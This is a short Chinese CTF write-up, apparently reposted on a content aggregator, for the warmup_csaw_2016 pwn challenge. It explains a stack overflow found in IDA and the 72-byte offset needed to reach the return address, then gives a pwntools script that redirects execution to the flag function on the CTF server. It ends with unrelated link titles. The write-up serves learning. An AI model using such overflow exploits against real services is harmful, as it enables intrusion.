buuctf.pwn.warmup_csaw_2016

Posted 总结比埋头苦干更加重要

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了buuctf.pwn.warmup_csaw_2016相关的知识,希望对你有一定的参考价值。

首先检测

托进IDA,简单分析一下函数
main函数有个溢出漏洞

然后整体存在一个flag函数

通过main图片知道,变量v5的地址是ebp-0x40
而我们的攻击的地址是ebp+0x08
2个地址之间差距了72字节,然后我么还要写入8字节
所以payload

payload = b\'Y\' * (72)+p64(0x000000000040060D)

于是脚本如下

from pwn import *
p = remote(\'node4.buuoj.cn\', 25743) 
payload = b\'Y\' * (72)+p64(0x000000000040060D)
p.sendline(payload)
p.interactive()

以上是关于buuctf.pwn.warmup_csaw_2016的主要内容,如果未能解决你的问题,请参考以下文章

caffe编译nvcc warning:The 'compute_20', 'sm_20'

7th/Jan/2018__20:20

dyld:找不到符号:__TWPVs11AnyHashables20_AnyHashableProtocols

GT9800是不是支持compute_20?

使用不匹配的选项“-arch=compute_20 -code=sm_20”为 GeForce 310(计算能力 1.2)编译 CUDA 程序

20_集合_第20天(Map可变参数Collections)_讲义